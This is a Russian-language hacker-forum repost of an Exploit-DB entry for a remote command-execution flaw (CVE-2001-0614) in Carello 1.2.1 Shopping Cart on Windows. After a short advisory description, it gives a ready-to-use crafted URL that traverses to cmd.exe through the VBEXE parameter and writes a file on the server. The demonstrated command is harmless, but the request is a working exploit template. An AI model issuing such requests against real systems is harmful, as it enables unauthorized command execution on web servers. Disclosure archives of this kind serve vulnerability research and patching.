Exploit Pacific Software Carello 1.2.1 Shopping Cart - Command Execution

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
20850
Проверка EDB
  1. Пройдено
Автор
PETER GRüNDL
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
cve-2001-0614
Дата публикации
2001-05-14
Код:
source: https://www.securityfocus.com/bid/2729/info

It is possible for a remote user to execute arbitrary commands on a host using Carello Shopping Cart software. A specially crafted HTTP request could cause inetinfo.exe to consume all available system resources, refusing any new connections. If arbitrary code is part of the HTTP request, it will be executed with the privileges of the web server.

http://foo.org/scripts/Carello/Carello.dllCARELLOCODE=SITE2&VBEXE=C:\..\winnt\system32\cmd.exe20/c20echo20test>c:\defcom.txt
 
Источник
www.exploit-db.com

Похожие темы